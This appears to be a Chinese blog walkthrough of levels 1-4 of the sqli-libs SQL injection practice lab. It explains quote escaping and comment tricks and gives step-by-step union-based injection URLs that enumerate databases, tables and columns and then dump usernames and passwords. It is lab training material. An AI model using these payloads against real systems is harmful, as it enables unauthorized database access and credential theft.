码迷,mamicode.com
首页 > 数据库 > 详细

【20171029中】sqli-libs 注入的过程 less1-4

时间:2017-10-29 00:33:34      阅读:265      评论:0      收藏:0      [点我收藏+]

标签:br0   vbs   imp   mba   csu   tom   qdt   sdk   tin   

  老黑在自己的虚拟中装了一个ubuntu14.04版本的镜像,然后只用了三条命令就将这款SQL注入的游戏安装好了,配张图晒一晒。

技术分享

  好了,浪费太多时间了,让我们赶紧开始吧!见证奇迹的时刻到了!!!

  less 1

  s1: 基本方式 1‘ and ‘1‘ = ‘1,合成到sql便是,select * from users where id=‘ 1‘ and ‘1‘ = ‘1 ‘ ....,将自己的输入 and ‘1‘ = ‘ 也在代码中起到了sql的作用,所以这便是注入的姿态,一是逃脱输入的原本定义,出现在外边,然后充当操作数据库的命令。二是保证不报错。

        对于第一个要求,一般需要尝试,视情况而定,先不出招,讲究后发先至,第二种要sql的注释进行注释掉,常用的有--+,--是sql单行注释,+是连接符,同时也有其他的注释,还可以是 #的 url 编码 %23 也可以。

  s2:

   

1 猜测有字段数量:http://IP/sqli-libs/Less-1?id=1‘ order by 4--+   
2 猜测回显位置:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,2,3--+
3 猜测当前数据库名:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,(select database()),3--+
4 猜测数据库表名:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
5 获取数据库中所有表:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479) --+
6 获取列名:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)--+
7 获取具体数据:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
8 获取数据库版本:http://IP/sqli-libs/Less-1?id=-1‘ union select 1,version(),database()--+

    第4行:schema_name是数据库名,information_schema是mysql自带的数据库,起到视图的作用,存储了mysql中所有数据库,数据表,字段,用户,权限等等信息。

    第5行:0x7365637572697479 是目标数据库 ‘security‘的16进制,老黑使用‘security‘也是可以的。

    获取了数据表,数据表列,数据表字段值,数据库名已经完成了本次探索。

   less2-4 和第一题都很相似,答案如下

   

1 http://IP/sqli-libs/Less-3?id=-1  union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
2 http://IP/sqli-libs/Less-3?id=-1‘)  union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+
3 http://IP/sqli-libs/Less-4?id=-1") union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

  less5 有些不同,等到明天在测。

【20171029中】sqli-libs 注入的过程 less1-4

标签:br0   vbs   imp   mba   csu   tom   qdt   sdk   tin   

原文地址:http://www.cnblogs.com/heijuelou/p/7748609.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!